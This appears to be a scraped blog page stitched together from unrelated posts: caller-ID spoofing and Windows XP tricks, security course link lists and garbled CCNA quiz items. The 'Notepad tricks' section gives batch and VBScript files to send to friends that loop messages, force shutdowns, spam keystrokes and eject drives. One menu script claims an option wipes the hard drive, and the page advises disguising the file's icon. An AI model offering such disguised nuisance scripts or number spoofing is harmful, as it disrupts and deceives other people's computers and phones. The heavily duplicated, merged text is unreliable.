How To Call Your Friends With Their Own Number
With useful prank to confuse your friends. With this mobile hack, you can call your friends with their own mobile number… meaning by, they will see their own number calling them. Just follow the guidelines I have mentioned in this mobile hack article.
Mobile hack to call your friends:
1. Go to http://www.mobivox.com and register there for free account.
2. During registration, remember to insert Victim mobile number in “Phone number”
3. Complete registration and confirm your email id and then login to your account. Click on “Direct WebCall”.
4. You will arrive at page shown below. In “Enter a number” box, select your country and also any mobile number(you can enter yours). Now, simply hit on “Call Now” button to call your friend with his own number.
5. That’s it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.
So use this cool mobile hack to surprise and shock your friends. This mobile hack is free. So, you don’t need to lose a buck. Simply register and you’ll be able to perform this mobile hack. This mobile hack is available for almost all countries and all cell phones network providers. If you have any problem in implementing this mobile hack, please mention it in comments.
Install Windows XP In Less Than 15 Minutes
This artice is helpful for the guys who frequently format and install windows xp operating system on their PC or laptops. Normally XP installation takes around 40 minutes to complete, but this trick will enable you to save 10-15 minutes in Xp installation.
Follow the steps:-
1. Boot through Windows XP CD.
2. After all the files are completely loaded, you get the option to select the partition. Select c or any disk you want.
3. Now Format the partition, whether it is normal or quick with NTFS or FAT. i suggest to fornat with NTFS
4. Once the formatting is completed, All the setup files required for installation are copied. Restart your system by pressing Enter.
Now, Here begins the Main work which will save your time.
5. After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS installation.
6. Now just, Press SHIFT + F10 Key -> This will open command prompt.
7. Enter Taskmgr in the command prompt window. This will open Task Manager.
8. Click the Process Tab, here we find a process called Setup.exe >> Right Click on Setup.exe >> Set Priority >> Select High or Above Normal.
All Done..!!!
This artice is helpful for the guys who frequently format and install windows xp operating system on their PC or laptops. Normally XP installation takes around 40 minutes to complete, but this trick will enable you to save 10-15 minutes in Xp installation.
Follow the steps:-
1. Boot through Windows XP CD.
2. After all the files are completely loaded, you get the option to select the partition. Select c or any disk you want.
3. Now Format the partition, whether it is normal or quick with NTFS or FAT. i suggest to fornat with NTFS
4. Once the formatting is completed, All the setup files required for installation are copied. Restart your system by pressing Enter.
Now, Here begins the Main work which will save your time.
5. After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS installation.
6. Now just, Press SHIFT + F10 Key -> This will open command prompt.
7. Enter Taskmgr in the command prompt window. This will open Task Manager.
8. Click the Process Tab, here we find a process called Setup.exe >> Right Click on Setup.exe >> Set Priority >> Select High or Above Normal.
3. Now Format the partition, whether it is normal or quick with NTFS or FAT. i suggest to fornat with NTFS
4. Once the formatting is completed, All the setup files required for installation are copied. Restart your system by pressing Enter.
Now, Here begins the Main work which will save your time.
5. After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS installation.
6. Now just, Press SHIFT + F10 Key -> This will open command prompt.
7. Enter Taskmgr in the command prompt window. This will open Task Manager.
8. Click the Process Tab, here we find a process called Setup.exe >> Right Click on Setup.exe >> Set Priority >> Select High or Above Normal.
All Done..!!!
\10 Notepad Tricks To Freak Your Friends
1>Cycle a message in your friend’s computer:
Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as “Anything.BAT” and send it.
2>Convey your friend a lil’ message and shut down his / her computer:
Type :
Type :
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
Save it as “Anything.BAT” in All Files and send it.
3>Toggle your friend’s Caps Lock button simultaneously:
Type :
Type :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Anything.VBS” and send it.
4>Continually pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them!
Type :
Type :
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS” and send it.
5>Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save it as “Anything.VBS” and send it.
6>Open Notepad, slowly type “Hello, how are you? I am good thanks” and freak your friend out:
Type :
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! ”
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! ”
Save it as “Anything.VBS” and send it.
7>Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
Type :
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as “Anything.VBS” and send it.
8> Dont ever try
Hack your friend’s keyboard and make him type “You are a fool” simultaneously:
Type :
Hack your friend’s keyboard and make him type “You are a fool” simultaneously:
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save it as “Anything.VBS” and send it.
9>Open Notepad continually in your friend’s computer:
Type :
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “Anything.BAT” and send it.
10>
Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as “Anything.BAT” and send it.
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the ‘Change’ Icon and change the icon from there.
Recent Cyber Attacks
Gregg County Cyber Attack (Occurred on Nov. 23, 2010)
- (Dec. 7, 2010) Cyber thieves hit Gregg County for $200K
- (Dec. 8, 2010) Cyber expert helping Secret Service on county tax theft case
- (Dec, 9, 2010) Area counties, cities look at cyber security after Gregg County theft
- (Dec. 11, 2010) Cyber theft presents uncharted legal territory
News-Journal, Longview, TX
KETK, Tyler, TX
Other Links
Counter Hack Reloaded (Skoudis and Liston, 2e)
- Ch. 1 - Introduction
- Ch. 2 - Networking Overview
- Ch. 3 - Linux and UNIX Overview
- Ch. 4 - Windows NT/2000/XP/2003 Overview
- Ch. 5 - Phase 1: Reconnaissance
- Ch. 6 - Phase 2: Scanning
- Ch. 7 - Phase 3: Gaining Access Using Application and Operating System Attacks
- Ch. 8 - Phase 3: Gaining Access Using Network Attacks
- Ch. 9 - Phase 3: Denial-of-Service Attacks
- Ch. 10 - Phase 4: Maintaining Access: Trojans, Backdoors, and Rootkits
- Ch. 11 - Phase 5: Covering Tracks and Hiding
- Ch. 12 - Putting It All Together: Anatomy of an Attack
- Ch. 13 - The Future, References, and Conclusions
Network Security Essentials (Stallings, 3e)
- Stallings : Student Resources
- Stallings : Instructor Resources
- Chapter Slides
- Chapter 1 - Introduction
- Chapter 2 - Conventional Encryption
- Chapter 3 - Public Key Cryptography
- Chapter 4 - Authentication Applications
- Chapter 5 - Electronic Mail Security
- Chapter 6 - IP Security
- Chapter 7 - Web Security
- Chapter 8 - Network Management Security
- Chapter 9 - Intruders
- Chapter 10 - Malicious Software
- Chapter 11 - Firewalls
- Chapter Figures
- Chapter Tables
- Chapter 1 - Introduction
- Chapter 2 - Conventional Encryption
- Chapter 3 - Public Key Cryptography
- Chapter 4 - Authentication Applications
- Chapter 5 - Electronic Mail Security
- Chapter 6 - IP Security
- Chapter 7 - Web Security
- Chapter 8 - Network Management Security
- Chapter 9 - Intruders
- Chapter 10 - Malicious Software
- Chapter 11 - Firewalls
General Security Tools
SSL Attacks
- Website Danger as Hacker Breaks SSL Encryption
- SSL Strip Software
- Security Now 217: The Broken Browser Model
Cyber Security Links
Cyber Security Papers
- Critical Infrastructure Interdependencies
- Performance, Robustness, and Cyber Security of Critical Infrastructure Systems
- Simplified Wireless Security for Home and Small Business Networks
- CIS Security Metrics (pdf)
Graduate School Opportunities
- Center for Cyberspace Research at AFIT
Trick to Find Windows XP Product Key from CD Itself
Windows product keys are used in order to activate the OS and reload its full functionality else it will not work properly and even show those un genuine errors, well now Windows XP is little bit older as we have new generation OS ready to be installed on your system like Windows 8.1 or even Windows 7 (I like it a lot) but still if you are a Windows XP addict then we have an awesome trick for you that will allow you to disclose its product key right from the installation CD.
Yes we posted about the Windows Product key finder tool that scans for the product key on running machine even that can come handy but if you have not installed the OS yet and you are finding the genuine then this tutorial can be lucky for you.
- So just pop in the Windows XP installation disc in your CD-Rom and then open the CD using Explorer.
- Now you need to find a folder named
i386
- Now we need to find a file named
UNATTEND.TXT
so if you are not able to see the .TXT extension no problem. - So now just open this file using Notepad and scroll down to the bottom till you actually see the Product Key.
NETWORKS AND DATA COMMUNICATIONS
General Information
- Instuctor's Sample Source Code Files
- Internet Measurement Tools
- PCI/PCI-X Family of Gigabit Ethernet Controllers Software Developer's Manual (Intel 8245x)
General Presentations
- Forouzan, Ch. 19 - Network Layer: Logical Addressing
- Wang, Ch. 18 - Internet Protocol Addresses
- Cisco - IP Addressing
UNIX Network Programming (Stevens, 3rd Edition)
- Source Code (After downloading: tar -xvf unpv13e.tar.gz)
- Tutorial on SCTP
Wireless Networks
- Book of Wireless, Chapter 2
- Tutorial on IEEE 802.11 (pdf)
- Authentication, Authorization, and Accounting in 802.11 (pdf)
- Remote Authentication Dial-In User Service (RADIUS)
- DIAMETER
- The Electromagnetic Spectrum
- The Radio Frequency Spectrum
- The Electromagnetic Spectrum and Medical Therapy
- The Radio Spectrum Allocations Chart
- Birds and Wireless Technology (BMP)
Cisco 2600 Router
- Software Configuration Guide (pdf)
- Quick-Start Guide for Cisco 2610 Router Cabling and Setup (pdf)
- Cisco 2600 Series Cabling and Setup (pdf)
- Cisco Modular Access Router Cable Specifications (pdf)
Cisco 2950 Switch
CCNA Guide To CISCO Networking (Cannon, 4th Edition)
- Chapter 1 - Introducing Networks
- Chapter 2 - Network Devices
- Chapter 3 - TCP/IP
- Chapter 4 - IP Addressing
- Chapter 5 - Router and IOS Basic
- Chapter 6 - Router Startup and Configuration
- Chapter 7 - Routing Protocols
- Chapter 8 - Advanced Routing Protcols
- Chapter 9 - Network Services
- Chapter 10 - Access Lists
- Chapter 11 - PPP and Frame Relay
- Chapter 12 - Basic Switching and Switch Configuration
- Chapter 13 - Advanced Switching Concepts
- Chapter 14 - Network Security
Research Papers
CCNA: Cisco Certified Network Associate: Fast Pass
Organized by exam objectives, this is a focused, concise review guide that works hand-in-hand with any learning tool, including the Sybex CCNA: Cisco Certified Network Associate Study Guide, 6th and Deluxe editions.
The book will consist of four high-level chapters, each mapping to the four main Domains of the exam skill-set. The book will drill down into the specifics of the exam, covering the following:
* Designing Cisco internetworks
* Developing an access list
* Evaluating TCP/IP communication
* Configuring routers and switches
* Configuring IP addresses, subnet masks, and gateway addresses
* Performing LAN, VLAN, and WAN troubleshooting
* Understanding rules for packet control
The interactive CD contains two bonus exams, handy flashcard questions, and a searchable PDF of a Glossary of Terms.
The perfect companion to Sybex's CCNA: Cisco Certified Network Associate Study Guide, Sixth or Deluxe editions, or any CCNA study tool
The Perfect CCNA Preparation and Review Tool
Many candidates who complete a Study Guide or course also appreciate a review tool that helps them brush up on key topics. Sybex's CCNA Fast Pass, Third Edition, is that tool. This streamlined book hones in on critical information for the new CCNA exam 640-802, including network planning and design, implementation and operation, troubleshooting, and technology. Study, review, and practice with this practical study aid, then take the exam with confidence.
* Easy-to-use book is organized by exam objectives for quick review
* Flexible Fast Pass goes hand-in-hand with any learning tool on the market
* Exam Essentials in each chapter helps you zero in on what you need to know
* Book includes review questions, practice tools, and two practice exams
* Targeted and expert content from leading Cisco networking authority, Todd Lammle
Look inside for complete review coverage of all exam objectives for CCNA Exam 640-802
Download here (8.3M pdf)
BCRAN Knowledgenet Labs
- 01Chap 4 Initial Configuration
- 02Chap 4 Configure Serial Interface & Line
- 03Chap 4 Configuring the Central Modem
- 04Chap 4 Configuring the PC Modem
- 05Chap 5 PPP and Telnet on the Central Site
- 06Chap 7 Configure ISDN - BRI
- 07Chap 7 Configure ISDN - PRI
- 08Chap 7 Verifying the ISDN Connection
- 09Chap 8 Incoming Async. Calls
- 10Chap 9 Configure Home to Comm. Central
- 11Chap 9 Configuring the 3640
- 12Chap 10 Configuring X.25 Transport
- 13Chap 11 Frame Relay Subinterfaces
- 14Chap 11 Config. Frame Relay - Branch
- 15Chap 11 Frame Relay Traffic Shaping
- 16Chap 11 Verifying frame-Relay Operation
- 17Chap 12 Preparing BRI Int - Backup Dialup
- 18Chap 12 Establish a Backup Connection
- 19Chap 13 Configuring Custom Queuing
- 20Chap 13 Preparing the Network
- 21Chap 13 Constructing the Priority List
- 22Chap 13 Verifying Custom Configuration
- 23Chap 14 Static Network Addr. Translation
- 24Chap 14 Dynamic Network Address Translation
- 25Chap 15 Securing Access
- 26Chap 15 AAA Login Authentication
Sample CCNA
CCNA 1 - Module 10
Options With Highlight Colours are Correct Answer
1. Refer to the exhibit. A student working in the lab selects a cable that is wired as shown. Which connection types can successfully be made with this cable? (Choose two.)connecting a PC to a router's console port
connecting two routers together via their fast ethernet portsconnecting two switches together at gigabit speeds
connecting a PC to a switch at Gigabit Ethernet speeds
connecting two devices with the same interface type at Fast Ethernet speeds
2. Which option identifies the primary interface which would be used for initial configuration of a Cisco router?AUX interface
Ethernet interface
serial interface
console interface
3. What makes fiber preferable to copper cabling for interconnecting buildings? (Choose three.)greater distances per cable runlower installation cost
limited susceptibility to EMI/RFIdurable connections
greater bandwidth potentialeasily terminated
4. A network administrator is required to use media in the network that can run up to 100 meters in cable length without using repeaters. The chosen media must be inexpensive and easily installed. The installation will be in a pre-existing building with limited cabling space. Which type of media would best meet these requirements?STP
UTP
coaxial
single-mode fiber
multimode fiber5. What does the term "attenuation" mean in data communication?loss of signal strength as distance increasestime for a signal to reach its destination
leakage of signals from one cable pair to another
strengthening of a signal by a networking device
6. How many host addresses may be assigned on each subnetwork when using the 130.68.0.0 network address with a subnet mask of 255.255.248.0?
30
256
20462048
4094
40967. Which subnet mask would be assigned to the network address of 192.168.32.0 to provide 254 useable host addresses per subnetwork?255.255.0.0
255.255.255.0
255.255.254.0
255.255.248.08. A company is planning to subnet its network for a maximum of 27 hosts. Which subnet mask would provide the needed hosts and leave the fewest unused addresses in each subnet?
255.255.255.0
255.255.255.192
255.255.255.224
255.255.255.240
255.255.255.248
9. What type of network cable is used between a terminal and a console port?
cross-over
straight-through
rolloverpatch cable
10. Which device is used to create or divide broadcast domains?hub
switch
bridge
router
repeater
11. Refer to the exhibit. What destination IP address will PC1 place in the header for a packet destined for PC2?192.168.1.1
192.168.2.1
192.168.2.2
192.168.3.1
192.168.3.54
12. Refer to the exhibit. Based on the IP configuration shown, what would be the result of Host A and Host B attempting to communicate outside the network segment?
both host A and B would be successful
host A would be successful, host B would fail
host B would be successful, host A would failboth Host A and B would fail
13. Which three types of connectors are commonly associated with Cisco's V.35 serial cables? (Choose three.)RJ 11
DB 60
Winchester 15 pin
DB 9
smart serialRJ 45
14. Refer to the exhibit. How many subnets are required to support the network that is shown?
2
3
4
5
15. What are three common methods for setting a UTP Ethernet port to MDI or MDIX operation? (Choose three.)
direct configuration of the devicecable color code association
cable selection and configuration
use of cable testers to determine pinouts
the enabling of the mechanism to electrically swap the transmit and receive pairs
the automatic detection and negotiating of MDI/MDIX operation of the port
16. Which three statements are true about the role of routers in the network? (Choose three.)They propagate broadcasts.
They enlarge collision domains.
They segment broadcast domains.
They interconnect different network technologies.
Each router interface requires a separate network or subnet.They maintain a common frame format between LAN and WAN interfaces.
17. Refer to the exhibit. A network administrator has decided to use packet capture software to evaluate all traffic from the student subnet on the way to the Internet. To ensure that all packets are captured, what network device should be used to connect the monitoring station to the network between R1 and R2?
router
hub
switch
wireless access point
18. Refer to the exhibit. Assume that all devices are using default settings. How many subnets are required to address the topology that is shown?
1
3
4
5
7
19. Refer to the exhibit. Which three statements are true about the exhibited topology? (Choose three.)
Hosts B and C are in the same subnet.
Five broadcast domains are present.
Host B is using a crossover cable to connect to the router.Four broadcast domains are present.
Five networks are shown.Host B is using a rollover cable to connect to the router.20. To establish a console connection from a computer to a Cisco router, which cable wiring option would be used?crossover cable
straight through cable
rollover cable
V.35 cable
21. Refer to the exhibit. Which three statements identify the type of cabling that would be used in the segments that are shown? (Choose three.)
Segment 1 uses backbone cabling.
Segment 1 uses a patch cable.Segment 3 uses patch cabling.
Segment 3 uses vertical cabling.
Segment 3 uses horizontal cabling.
Segment 4 uses vertical cabling.
22. Refer to the exhibit. A network technician has been allocated the 192.168.1.0/24 private IP address range for use in the network that shown in the exhibit. Which subnet mask would be used to meet the host requirements for segment A of this internetwork?
255.255.255.128
255.255.255.192
255.255.255.224255.255.255.240
255.255.255.248
CCNA 1 - Module 11
Options With Highlight Colours are Correct Answer
1. Users in the network are experiencing slow response time when doing file transfers to a remote server. What command could be issued to determine if the router has experienced any input or output errors?
show running-config
show startup-config
show interfaces
show ip route
show version
show memory
2. Refer to the exhibit. A technician applies the configuration in the exhibit to a clean router. To verify the configuration, the technician issues the show running-config command in the CLI session with the router. What lines should the technician expect to see in the router output from the show running-config command?
enable password classline console 0password ccna
enable secret ciscoenable password classline console 0password ccna
enable secret 5 $1$v0/3$QyQWmJyT7zCa/yaBRasJm0enable password classline console 0password ccna
enable secret ciscoenable password 7 14141E0A1F17line console 0password 7 020507550Aenable secret 5 $1$v0/3$QyQWmJyT7zCa/yaBRasJm0enable password 7 14141E0A1F17line console 0password 7 020507550A
3. Refer to the exhibit. A network administrator on HostA has problems accessing the FTP server. Layer three connectivity testing was successful from HostA to the S1 interface of RouterB. Which set of commands will allow the network administrator to telnet to RouterB and run debug commands?RouterB(config)# enable secret class
RouterB(config)# line vty 0 4
RouterB(config-if)# login
RouterB(config)# enable secret class
RouterB(config)# line vty 0 2
RouterB(config-vty)# password cisco
RouterB(config-vty)# login
RouterB(config)# enable secret class
RouterB(config)# line vty 0
RouterB(config-line)# password ciscoRouterB(config-line)# loginRouterB(config)# enable secret classRouterB(config)# line aux 0RouterB(config-line)# password ciscoRouterB(config-line)# login
RouterB(config)# enable secret classRouterB(config)# line aux 0RouterB(config-vty)# password ciscoRouterB(config-vty)# login4. Refer to the exhibit. The output is shown for the show ip route command executed on Router A. What does the IP address 192.168.2.2 represent?
Gateway for the 192.168.1.0 network
Gateway for the 192.168.3.0 network
IP assigned to the serial port on Router A
IP assigned to the serial port on Router B
5. What command is used to change the default router name to Fontana?Router# name Fontana
Router# hostname Fontana
Router(config)# name Fontana
Router(config)# hostname Fontana
6. The serial connection shown in the graphic needs to be configured. Which configuration commands must be made on the Sydney router to establish connectivity with the Melbourne site? (Choose three.)Sydney(config-if)# ip address 201.100.53.2 255.255.255.0
Sydney(config-if)# no shutdownSydney(config-if)# ip address 201.100.53.1 255.255.255.224
Sydney(config-if)# clock rate 56000Sydney(config-if)# ip host Melbourne 201.100.53.27. Refer to the exhibit. What additional command is required to allow remote access to this switch?
NA-SW1(config-if)# no shutdown
NA-SW1(config)# enable password password
NA-SW1(config)# ip default-gateway addressNA-SW1(config-if)# description description8. When network services fail, which port is most often used to access a router for management purposes?AUX
Ethernet
ConsoleTelnet
SSH
9. A network administrator needs to keep the user ID, password, and session contents private when establishing remote CLI connectivity with a router to manage it. Which access method should be chosen?Telnet
Console
AUX
SSH10. In a Cisco router, when do changes made to the running-configuration take effect?
after a system restart
as the commands are entered
when logging off the system
when the configuration is saved to the startup-configuration11. Refer to the exhibit. Which names correctly identify the CLI mode represented by the prompt for Switch-East4#? (Choose two.)
line configuration mode
user executive mode
global configuration mode
privileged executive modeinterface configuration mode
enable mode12. Which three terms correctly define the forms of help available within the Cisco IOS? (Choose three.)hot keys
context-check
context-sensitive
structured check
command override
command syntax check13. Which combination of keys would be used at the CLI prompt to interrupt a ping or traceroute process?Ctrl-C15. On a Cisco router, which interface would be used to make the initial configuration?Console Port
Ctrl-P
Ctrl-R
Ctrl-Shift-6
Ctrl-Z
14. Refer to the exhibit. What command will place the router into the correct mode to configure an appropriate interface to connect to a LAN?
UBAMA# configure terminal
UBAMA(config)# line vty 0 4UBAMA(config)# line console 0
UBAMA(config)# interface Serial 0/0/0
UBAMA(config)# interface FastEthernet 0/1
16. Refer to the exhibit. A student is responsible for the IP addressing, configuration and connectivity testing of the network shown in the graphic. A ping from host B to host C results in a destination unreachable but a ping from host B to host A was successful. What two reasons could account for this failure based on the graphic and partial router output for the Dallas router? (Choose two.)The host A is turned off.
The Fa0/0 interface on Dallas is shutdown.
The LAN cable is disconnected from host B.
The S0/0/1 IP address of Dallas is improperly configured.The Fa0/0 interface on Dallas is in a different subnet than host B.
The clock rate is missing on the serial link between Dallas and NYC.
No comments:
Post a Comment